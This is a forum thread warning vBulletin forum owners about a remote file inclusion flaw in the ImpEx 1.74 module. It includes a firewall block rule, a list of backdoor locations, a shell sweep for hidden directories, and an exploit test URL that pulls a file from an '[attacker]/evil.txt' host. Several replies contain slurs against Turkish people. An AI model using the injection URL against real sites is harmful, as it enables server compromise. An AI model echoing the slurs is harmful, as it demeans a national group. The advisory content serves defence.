ALERT for all Forum owners running vBulletin.
SplitInfinity here letting you know that....

There is a known Turkish hacker group targeting the adult industry. The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

First, you should immediately block this class C:

    ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all

For some reason, they keep using the same IPs. Lame hackers. :-)

I have tracked them down and done some stuff to stop them from what they are doing.... however you should be warned that if you run vBulletin they will be hitting you soon! So far they have taken out over 10,000 sites as reported on securityfocus.

Vulnerability Classification:
* Remote/Network Access Required
* Input Manipulation
* Loss Of Integrity
* Exploit Available
* Verified
* Web Related

Products:
* vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex )

Solution: Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes:
    http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?

Where the hackers play...
    http://www.sanalinfaz.com/forumm/sho...=6140#post6140

They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files....

Places to check:
    /tmp
    /var/tmp/
    /var/tmp/ssh
    /var/tmp/root

Look for a file simply named "a"; it is a backdoor.

That list is NOT all inclusive as different groups will run different root kits for the same exploit....

Look for hidden directories by hitting TAB. Example:

    ls -la
    total 20
    drwxr-xr-x  3 apache apache 4096 Apr 22 03:58
    drwxrwxrwt  3 root   root   4096 May 13 13:20 .
    drwxr-xr-x 24 root   root   4096 Jan 29 20:50 ..

Notice the seemingly empty one on top? If I type:

    cd [TAB]

I get this:

    cd \ /multi/

They used control characters to hide the name of the directory. It becomes exposed when tab completion has a go at it. They basically named the directory " " space... :-)

So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit they run is in there. :-)

    total 1360
    drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 .
    drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 ..
    -rw-r--r-- 1 apache apache  454 Apr 24 07:08 `2Skeletzi.seen
    -rw-r--r-- 1 apache apache  143 Apr 24 07:08 `50Cent.seen
    -rw-r--r-- 1 apache apache  647 Apr 24 07:08 `50Centz.seen
    -rw-r--r-- 1 apache apache  887 Apr 24 07:08 `5OCentz.seen
    -rwxr-xr-x 1 apache apache   12 Dec 26 01:51 acycmech
    -rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen
    -rw-r--r-- 1 apache apache  527 Apr 24 07:08 Alexandreta.seen
    -rw-r--r-- 1 apache apache  712 Apr 24 07:08 Al`Quaida.seen
    -rw-r--r-- 1 apache apache  452 Apr 24 07:08 A-Tentat`.seen
    -rw-r--r-- 1 apache apache  435 Apr 24 07:08 Aurora.seen
    -rw-r--r-- 1 apache apache  234 Apr 24 07:08 BadBoy^.seen
    -rw-r--r-- 1 apache apache  276 Apr 24 07:08 BaxDeCd`ie.seen
    -rw-r--r-- 1 apache apache  941 Apr 24 07:08 B`Nicolita.seen
    -rw-r--r-- 1 apache apache  878 Apr 24 07:08 Boxe.seen
    -rw-r--r-- 1 apache apache  363 Apr 24 07:08 BUG`Mafia.seen
    -rw-r--r-- 1 apache apache  842 Apr 24 07:08 C0Sty.seen
    -rw-r--r-- 1 apache apache  620 Apr 24 07:08 CaracalCity.seen
    -rw-r--r-- 1 apache apache  799 Apr 24 07:08 caracalmwe.seen
    -rw-r--r-- 1 apache apache  339 Apr 24 07:08 CaracalTown.seen
    -rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen
    -rw-r--r-- 1 apache apache  692 Apr 24 07:08 CartierulHCC.seen
    -rw-r--r-- 1 apache apache  581 Apr 24 07:08 CartziDeJoc.seen

Etc.... the list goes on |
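An added example, not part of the original post or of vBulletin: a POSIX shell sweep of the drop locations the post names that flags any entry whose name contains whitespace or control characters (the trick the tab-completion check above exposes) and prints the name as hex so the hidden bytes are visible. The directory tree it builds under mktemp is constructed for the demo; the directory paths to sweep are assumed from the post's "Places to check" list.

```shell
#!/bin/sh
# Added example (not from the original thread). Flags directory entries whose
# names contain space/control bytes, which is how the " " directory in the
# post stayed invisible in a plain `ls -la`. Names are shown as hex bytes.

# find_hidden_names DIR
# Prints one line per suspicious entry:  <dir|file> DIR/ name-hex:[20 ...]
find_hidden_names() {
    dir=$1
    [ -d "$dir" ] || return 0
    # three globs so dot-entries are covered; a name made of spaces does
    # not start with '.' and is matched by the plain '*'
    for path in "$dir"/* "$dir"/.[!.]* "$dir"/..?*; do
        [ -e "$path" ] || continue        # an unmatched glob stays literal
        name=${path##*/}
        if printf '%s' "$name" | LC_ALL=C grep -q '[[:space:][:cntrl:]]'; then
            if [ -d "$path" ]; then kind=dir; else kind=file; fi
            hex=$(printf '%s' "$name" | od -An -tx1 | tr -s ' \n' ' ')
            hex=${hex# }; hex=${hex% }
            printf '%s %s/ name-hex:[%s]\n' "$kind" "$dir" "$hex"
        fi
    done
}

# sweep_drop_dirs: run the check over the locations the post lists.
sweep_drop_dirs() {
    for d in /tmp /var/tmp /var/tmp/ssh /var/tmp/root; do
        find_hidden_names "$d"
    done
}

# Demo on a constructed tree mimicking the post's find: a directory named
# " " holding a "multi" subdirectory, next to an innocent entry.
demo_sweep() {
    root=$(mktemp -d)
    mkdir -p "$root/ /multi" "$root/innocent"
    : > "$root/ /multi/a"
    find_hidden_names "$root"      # prints: dir <root>/ name-hex:[20]
    rm -rf "$root"
}

demo_sweep
```

Run `sweep_drop_dirs` as root on a suspect box; anything it prints deserves a closer look with `ls -lab` on the reported path.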
Thanks for the heads up!
|
darn Turkish hackers :mad:
they want my sig now? :smokin |
hence proving my point chris is by far the whitest cracker here :thumbsup good find dude
|
Thanks.
My opinion is that by sharing the info I find, I help secure everyone, not just my customers. However, it does put my customers in a good place, don't it? :-) Love ya all... |
Thank you very much!!
|
Bump, if only to piss off the Turkish hackers.
|
Here's a bump for TD
|
thanks for the update :thumbsup
|
Sounds like those Ottoman Empire hackers, they aren't just hacking the adult industry, it's all western sites, propaganda saying "u attack our homes blah blah we attack your websites".
|
will this hack work on windows servers?
|
thx for the headsup
|
That's the vBulletin ImpEx Module version 1.74. It's in vBulletin 3.5 (don't know what earlier versions it's also in or if they are susceptible). |
Turkish people who don't like porn... hmm... is there anything they like, other than ugly women and hashish?
|
Rofl. Good work. You're only like 3 months too late. All that was supposed to be hacked was already hacked by now.
|
going to work on that soon, thx for the heads up
|
going to work on that soon, thx for the heads up
|
Nice geek detective work. I'm impressed.
|
with a properly secured server it should be impossible to own a site with this exploit... :2 cents:
|
just hell with Turkish hackers, they don't even know English
|
Cyber Jihad!!!
|
Woj, not everyone has a properly secured server because the programs they run have unknown exploits, that BECOME exploits after they are discovered.
|
Ah, Thanks for the heads up!
|
great heads up :)
|
Thanks for the info!! :)
|
I want my GFY Money for nothin' and pics for free. |
Thanks for heads up!
|
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.